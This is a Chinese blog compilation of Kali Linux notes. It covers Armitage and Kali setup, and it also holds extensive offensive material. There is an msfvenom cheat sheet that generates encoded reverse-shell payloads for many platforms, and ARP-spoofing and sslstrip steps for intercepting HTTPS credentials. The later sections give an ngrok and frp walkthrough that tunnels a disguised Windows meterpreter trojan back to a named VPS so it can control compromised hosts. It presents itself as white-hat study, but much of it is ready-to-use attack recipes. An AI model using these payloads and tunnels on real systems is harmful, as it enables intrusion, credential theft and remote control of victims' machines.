渗透工具-白帽安全工程师Kali linux系统

渗透工具-白帽安全工程师Kali linux

2022 安装 Armitage 傻瓜渗透msf

msf是一个很好的渗透测试框架,但是苦于众多的指令,
因此出现一款软件可以将其图形化显示,这就是大名鼎鼎的armitage。

介绍

Armitage是一款Java写的Metasploit图形界面化的渗透软件,
可以用它结合Metasploit中已知的exploit来针对内网主机存在的漏洞自动化渗透,
由于作者已经不再更新版本,目前在kali linux 中是默认不安装的。

官网下载

kali tools地址:https://www.kali.org/tools/armitage/

下载地址:https://gitlab.com/kalilinux/packages/armitage

在这里插入图片描述
在这里插入图片描述在这里插入图片描述
在这里插入图片描述

build安装

打开终端:
┌──(kali㉿kali)-[~/桌面/111/armitage-kali-master]
└─$ ./package.sh

在这里插入图片描述

结束后在release里面有unix和windows两个文件夹。
在这里插入图片描述
在这里插入图片描述

打开终端:
┌──(kali㉿kali)-[~/桌面/111/armitage-kali-master/release/unix/]
└─$ ./armitage

就可以运行了,但是这时候运行会出现问题,还需要配置数据库。

配置数据库

数据的默认地址是:
/etc/postgresql/
后面是版本号:14/main/

在这里插入图片描述
全部注释掉,然后加上:

# "local" is for Unix domain socket connections only
local   all             all                           trust
# IPv4 local connections:
host    all             all             127.0.0.1/32            trust
# IPv6 local connections:
host    all             all             ::1/128                 trust

然后执行下面代码:

 ┌──(kali㉿kali)-[~]
└─$ sudo service postgresql stop

┌──(kali㉿kali)-[~]
└─$ sudo msfdb  reinit 

┌──(kali㉿kali)-[~]
└─$ sudo service postgresql start

┌──(kali㉿kali)-[~/桌面/111/armitage-kali-master/release/unix/]
└─$ sudo ./armitage

在这里插入图片描述
在这里插入图片描述

在这里插入图片描述在这里插入图片描述

Kali linux 介绍安装及入门

前身 BackTrack(BT) <— ubuntu

kali <— Debian linux 发行版

功能: 数字取证 渗透测试 黑客攻防 安全系统 支持ARM架构
开发团队:Offensive Security Devon Kearns

KaliLinux 渗透测试 艺术

在这里插入图片描述

在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述
预装软件:
nmap (端口扫描)
Wireshark(数据包分析)
John the Ripper (密码破解)
Aircrack-ng(无线局域网测试套装)
Metasploit Framework(针对远程主机开发/执行Exploit codeing Tools)

运行:
硬盘启动 liveCD liveUSB

U盘安装

建议下载 win32 Disk Imager
写入镜像 --> u盘

可以U盘启动

32/64 可能是AMD架构
在这里插入图片描述 自己区分 有人说32-i386位的好用 ,自己测试
512MB以上
20GB以上

(如果虚拟机 稍后引导iso文件 且 移除暂时不用的组件)
网速够快 NET适配 软件更新源(不建议)
网速不行Vmnet1 (仅主机模式)
Ctrl+Alt+insert (重启系统)

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

引导顺序 硬盘 光盘 u盘(有系统物理机 更改引导顺序eg:F12)
开机启动中时候
F12 /Esc
在这里插入图片描述

在这里插入图片描述
install
自己选择语言
帐号密码

分区

LVM Logical Volume Manager(逻辑卷管理)
Linux环境下对磁盘分区进行管理的一种机制

(建议)使用整个磁盘 将所有文件放在同一个分区

写入磁盘
在这里插入图片描述
不使用网络镜像
GRUB 引导启动 /dev/sda
(密码忘了的话 --> 去看看linux 密码破解攻防系列)

安装虚拟工具

umount / dev / sr0 卸载光盘
clear
mount /dev /sr0 /media 挂载
ls /media
cd /media
tar zxvf xxx.tar.gz -C /xxx/xxx
cd /xxx/xxx
ls
./vmware-install.pl
默认回车
在这里插入图片描述
死循环 填写no
安装完毕
sync 保存当前配置
reboot 重启

记录init 快照

在这里插入图片描述

###  查看预装软件   

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

完毕简单测试下

强行更改ip
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
:wq


https://mirrors.tuna.tsinghua.edu.cn/kali-images/kali-2021.1/

资源连接

kali下载连接:https://www.kali.org/downloads/
在这里插入图片描述

在这里插入图片描述

#中科大
deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
 
#阿里云
deb http://mirrors.aliyun.com/kali kali-rolling main non-free contrib
deb-src http://mirrors.aliyun.com/kali kali-rolling main non-free contrib
 
#清华大学
deb http://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free
deb-src https://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free
  
#官方源
deb http://http.kali.org/kali kali-rolling main non-free contrib
deb-src http://http.kali.org/kali kali-rolling main non-free contrib
  

#阿里巴巴
deb http://http.kali.org/kali kali-rolling main non-free contrib
 
deb http://mirrors.aliyun.com/kali kali-rolling main non-free contrib

在这里插入图片描述

apt-get update //获取最新软件包的列表


apt-get dist-upgrade 将根据需要安装或删除软件包以完成升级,
apt-get upgrade 将自动安装但不会删除包。
apt --fix-broken install

安装fcitx
apt-get install fcitx

 apt-get install fcitx fcitx.googlepinyin

三、下载搜狗输入法

   https://pinyin.sogou.com/linux/

在这里插入图片描述

 sudo dpkg -i sogoupinyin_版本号_amd64.deb
注:
如果安装过程中提示缺少相关依赖,则执行如下命令解决:
sudo apt -f install

apt-getinstallibus ibus-pinyin

在这里插入图片描述
2020 版本 非root用户 使用标准的非特权用户来增加额外的安全性
】- kali kali

在这里插入图片描述

需要root访问的工具,以及诸如启动/停止服务等常见的管理功能,将以交互方式请求管理权限(至少在从Kali菜单启动时)

我们不再为每个桌面环境(DE)提供单独的映像。
相反,我们现在有一个单独的映像,可以选择在安装期间选择DE。
这意味着没有Xfce(这是我们从2019.4开始的默认选项)、GNOME、KDE、MATE或LXDE桌面的下载链接


在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述



tools install

在这里插入图片描述在这里插入图片描述
cd /media/cdrom0/ 双击打开

在这里插入图片描述

cd 
ls
sudo tar zxvf  VM+TAB补全 -C /root

在这里插入图片描述在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

在这里插入图片描述


更新

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述在这里插入图片描述

  • 更新之前 先要 换源
    在这里插入图片描述
#中科大
 
deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
 
deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib


#阿里云
 
deb http://mirrors.aliyun.com/kali kali-rolling main non-free contrib
 
deb-src http://mirrors.aliyun.com/kali kali-rolling main non-free contrib

#清华大学
 
deb http://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free
 
deb-src https://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free

#浙大
 
deb http://mirrors.zju.edu.cn/kali kali-rolling main contrib non-free
 
deb-src http://mirrors.zju.edu.cn/kali kali-rolling main contrib non-free

#东软大学
 
deb http://mirrors.neusoft.edu.cn/kali kali-rolling/main non-free contrib
 
deb-src http://mirrors.neusoft.edu.cn/kali kali-rolling/main non-free contrib

#官方源
 
deb http://http.kali.org/kali kali-rolling main non-free contrib
 
deb-src http://http.kali.org/kali kali-rolling main non-free contrib

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

  • 我是全选了 源

    apt-get update && apt-get upgrade && apt-get clean

在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述
在这里插入图片描述在这里插入图片描述
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

易锦大学 热身 20211007 by:aming

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

CLAY 的 故事

在这里插入图片描述
在这里插入图片描述

黑猫

在这里插入图片描述

白猫

在这里插入图片描述

红客

在这里插入图片描述

网络安全法

在这里插入图片描述
在这里插入图片描述

渗透测试 套路

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

第二章–第1节–kali linux搭建

Kali Linux 2020.1修改root用户密码

安装Kali Linux 2020.1系统后,需要使用root用户权限安装软件。
由于root用户的默认密码未知,所以需要在单用户模式下重新设置root用户密码。
操作步骤如下:

(1)启动Kali Linux,进入启动界面。
(2)选择Kali GNU/Linux项,并按下e键,进入Grub编辑界面。
在这里插入图片描述

(3)选择linux那一行,将ro 改为 rw 在此行末尾增加 init=/bin/bash 修改完毕以后按Ctrl+X 键进入单用户模式
在这里插入图片描述
(4)按下Ctrl+X或F10重新启动系统,即可进入单用户模式。。
在这里插入图片描述
(5)执行passwd命令,输入两次密码。注意,输入的密码是不显示的。
在这里插入图片描述

vim/cat   /etc/shadow

在这里插入图片描述
(6)重启Kali 到此登陆页面,输入刚才设置的账号密码,回车进行登陆,至此已经使用root账号登陆成功
在这里插入图片描述

— 上面错误 直接关闭虚拟机 再打开就重启

在这里插入图片描述

锁屏

在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

msfvenom常用生成payload命令

在这里插入图片描述
在这里插入图片描述

windows:
msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=
攻击机IP LPORT=攻击机端口 -e x86/shikata_ga_nai -b ‘\x00\x0a\xff’ -i 3 -f exe -o
payload.exe
mac:
msfvenom -a x86 --platform osx -p osx/x86/shell_reverse_tcp LHOST=攻击机IP
LPORT=攻击机端口 -f macho -o payload.macho
android:
//需要签名
msfvenom -a x86 --platform Android -p android/meterpreter/reverse_tcp LHOST=攻
击机IP LPORT=攻击机端口 -f apk -o payload.apk
powershell:
msfvenom -a x86 --platform Windows -p windows/powershell_reverse_tcp LHOST=
攻击机IP LPORT=攻击机端口 -e cmd/powershell_base64 -i 3 -f raw -o payload.ps1
linux:
msfvenom -a x86 --platform Linux -p linux/x86/meterpreter/reverse_tcp LHOST=攻
击机IP LPORT=攻击机端口 -f elf -o payload.elf
php:
msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT=
-f raw > shell.php
cat shell.php | pbcopy && echo '<?php ’ | tr -d ‘\n’ > shell.php && pbpaste >>
shell.php
aspx:
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=
攻击机IP LPORT=攻击机端口 -f aspx -o payload.aspx
jsp:
msfvenom --platform java -p java/jsp_shell_reverse_tcp LHOST=攻击机IP LPORT=攻
击机端口 -f raw -o payload.jsp
war:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f raw -
o payload.war
nodejs:
msfvenom -p nodejs/shell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f raw -o
payload.js
python:
msfvenom -p python/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -
f raw -o payload.py
perl:
msfvenom -p cmd/unix/reverse_perl LHOST=攻击机IP LPORT=攻击机端口 -f raw -o
payload.pl
ruby:
msfvenom -p ruby/shell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f raw -o
payload.rb
lua:
msfvenom -p cmd/unix/reverse_lua LHOST=攻击机IP LPORT=攻击机端口 -f raw -o
payload.lua
windows shellcode:
msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=
攻击机IP LPORT=攻击机端口 -f c
linux shellcode:
msfvenom -a x86 --platform Linux -p linux/x86/meterpreter/reverse_tcp LHOST=攻
击机IP LPORT=攻击机端口 -f c
mac shellcode:
msfvenom -a x86 --platform osx -p osx/x86/shell_reverse_tcp LHOST=攻击机IP
LPORT=攻击机端口 -f c

Meterpreter持久控制服务器

在这里插入图片描述
在这里插入图片描述在这里插入图片描述在这里插入图片描述
在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述

Kali实战–HTTPS账户密码获取

HTTPS账户密码获取

HTTPS(全称:Hyper Text Transfer Protocol over SecureSocket Layer)
以安全为目标的 HTTP 通道
在HTTP的基础上通过传输加密和身份认证保证了传输过程的安全性
HTTPS 在HTTP 的基础下加入SSL 层,
HTTPS 的安全基础是 SSL,因此加密的详细内容就需要 SSL。
HTTPS 存在不同于 HTTP 的默认端口及一个加密/身份验证层(在 HTTP与 TCP 之间)。
这个系统提供了身份验证与加密通讯方法。
现在它被广泛用于万维网上安全敏感的通讯,例如交易支付等方面

实验环境:

在这里插入图片描述

SSH 连接

Ctrl+Alt+F1命令行界面登陆运行 或者 init 3(有的童鞋虚拟机)
init+数字所代表的命令:
0:停机或者关机(千万不能将initdefault设置为0)
1:单用户模式,只root用户进行维护
2:多用户模式,不能使用NFS(Net File System)
3:完全多用户模式(标准的运行级别)
4:安全模式
5:图形化(即图形界面)
6:重启(千万不要把initdefault设置为6)

注意命令模式开机可能 numlock是锁着的 打开小写键盘 (密码可能带有数字)
在这里插入图片描述
在这里插入图片描述
logout ###让用户退出系统的Linux命令。

在这里插入图片描述
在这里插入图片描述
###出了点小插曲
在这里插入图片描述
ssh连接 如果出现了 access denied
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
###还有一个故障 就是 init转换后图形化登陆循环
在网上找找有相应教程这里就不说了

##弄一个 xshell 得资源 需要的自取
690313-111999-999313 码
链接:https://share.weiyun.com/505zSO7 密码:rnawkn

Xshell 连上了在这里插入图片描述
在这里插入图片描述
之前用的 putty suite Xshell比putty功能强大
所以果断换 eg:复制SSH渠道
或者 Xshell:> ls 显示连接主机用户
或者 便捷命令在这里插入图片描述
arpspoof命令进行断网攻击(ARP欺骗)
arpspoof -i eth0 -t 192.168.1.112 192.168.1.1
与网络有关的-i(interface)
网卡eth0
目标-t(target)
目标IP:192.168.1.112
目标主机网关192.168.1.1

ettercap -i eth0 -Tq
driftnet -i eth0 -b -a -d /pic

解释下这几个参数
-i 监听网卡
-b 声音提醒
-a 保存图片(图片不会显示)
-d 图片保存目录
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
sslstrip

Wordpress渗透之Wpscan工具

一、什么是Wpscan?什么是Wordpres?

1.Wpscan

 WPScan是一款针对wordpress的安全扫描软件;
 可以扫描出wordpress的版本,
 主题,插件,后台用户以及爆破后台用户密码等。

2.Wordpress

 WordPress是一种使用PHP语言和MySQL数据库开发的博客平台,
 用户可以在支持PHP和MySQL数据库的服务器上架设属于自己的网站。
 也可以把 WordPress当作一个内容管理系统(CMS)来使用。
 WordPress有许多第三方开发的免费模板,安装方式简单易用。
 如果要做一个自己的模板,则需要有一定的专业知识,
 至少要懂的标准通用标记语言下的一个应用HTML代码、CSS、PHP等相关知识。

建站流程

  1. 注册域名
  2. 申请虚拟主机(国内主机:速度快,较贵,而空间较小;国外主机:便宜,速度慢,空间一般无限制)
  3. 在虚拟主机上绑定自己的域名
  4. 下载WordPress程序
  5. 修改域名的DNS解析
  6. 创建WordPress数据库
  7. 修改WordPress的安装配置文件
  8. 上传WordPress程序至ixwebhosting主机域名空间(ftp上传)
  9. 访问域名/wp-admin/install.php进行wordpress安装。填写博客信息及邮箱

二、Wpscan命令详解

  利用-h命令,可查看Wpscan的常用选项,功能介绍,例子等; 

root@kali:~# wpscan -h


    __          _______   _____                    
    \ \        / /  __ \ / ____|                   
     \ \  /\  / /| |__) | (___   ___  __ _ _ __    
      \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \   
       \  /\  /  | |     ____) | (__| (_| | | | |  
        \/  \/   |_|    |_____/ \___|\__,_|_| |_|  


    WordPress Security Scanner by the WPScan Team   
                   Version 2.8  
      Sponsored by Sucuri - https://sucuri.net   

在这里插入图片描述在这里插入图片描述在这里插入图片描述

 https://data.wpscan.org/plugins.json
https://data.wpscan.org/plugins.json.sha512
https://data.wpscan.org/themes.json
https://data.wpscan.org/themes.json.sha512
https://data.wpscan.org/wordpresses.json
https://data.wpscan.org/wordpresses.json.sha512
https://data.wpscan.org/timthumbs-v3.txt
https://data.wpscan.org/timthumbs-v3.txt.sha512
https://data.wpscan.org/config_backups.txt
https://data.wpscan.org/config_backups.txt.sha512
https://data.wpscan.org/db_exports.txt
https://data.wpscan.org/db_exports.txt.sha512
https://data.wpscan.org/dynamic_finders.yml
https://data.wpscan.org/dynamic_finders.yml.sha512
https://data.wpscan.org/wp_fingerprints.json
https://data.wpscan.org/wp_fingerprints.json.sha512
https://data.wpscan.org/LICENSE
https://data.wpscan.org/LICENSE.sha512
————————————————

在这里插入图片描述在这里插入图片描述在这里插入图片描述

C:\WINDOWS\system32\drivers\etc
在这里插入图片描述在这里插入图片描述

在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述
在这里插入图片描述


在这里插入图片描述
在这里插入图片描述

0708 centos matesploit 搭建

 yum groupinstall 'Development Tools'
 yum -y install sqlite-devel libxslt-devel libxml2-devel java-1.7.0-openjdk libpcap-devel nano openssl-devel zlib-devel libffi-devel gdbm-devel readline-devel nano wget
yum -y install ruby
yum -y install yaml
yum -y install postgresql

通过ngrok穿透反弹shell

0.0注册ngrok 内网穿透平台账号,开通免费隧道

网址:https://www.ngrok.cc

在这里插入图片描述
eg: 192.168.254.128 我的内网ip

在这里插入图片描述
在这里插入图片描述

0x01 下载安装穿透client客户端

地址:https://www.ngrok.cc/sunny/linux_amd64.zip?v=2.1

在这里插入图片描述

unzip
   ./sunny  clientid 隧道id  

在这里插入图片描述
在这里插入图片描述

0x02 Msfvenom 木&马生成

kali命令 生成EXE木马文件:

 msfvenom  -p windows/meterpreter/reverse_tcp LHOST=tcp://free.idcfengye.com LPORT=10206 -f exe -o /home/amingmm/Desktop/puty.exe

在这里插入图片描述

0x03 启动msf 配置Exploit模块

 Use exploit/multi/handler

0x04 选择攻击载荷上线

  set payload windows/meterpreter/reverse_tcp

在这里插入图片描述

 set
run/exploit

在这里插入图片描述

Frp将外网meterpreter转发至本地msf

https://github.com/fatedier/frp/releases【下载】
在这里插入图片描述
解压
● kali端 frpc配置

 [common]
server_addr = 121.5.64.200   #vps地址
server_port = 2580			#vps监听端口

[msf]
type = tcp
local_ip = 127.0.0.1
local_port = 12580		# msf载荷 监听端口 【即内网主机监听端口】
remote_port = 6666		# vps流量转发端口【流量出口 载荷端口】 

服务端

 [common]
bind_port = 2580  【服务端监听端口】
 ./frps(frpc) -c frps.ini (frpc.ini)  开启服务端(客户端)

systemctl start frps
systemctl restart frps
systemctl stop frps

● frp 连接流程
frps开启两个端口监听----< 内网客户端frpc 开启 tcp连接到 vps
vps–内网主机建立连接 连接1 建立

● 肉鸡上线 流程
载荷创建进程 主动连接 vps:载荷端口
管道流量转发 把 载荷端口 流量 通过tcp 连接 发包 传送到 内网kali端

● kali端 上线流程
kali端 frpc客户端 通过管道 将流量 转发给 msf handler -->监听端口

在这里插入图片描述

在这里插入图片描述

猜你喜欢

转载自blog.csdn.net/qq_33608000/article/details/125566390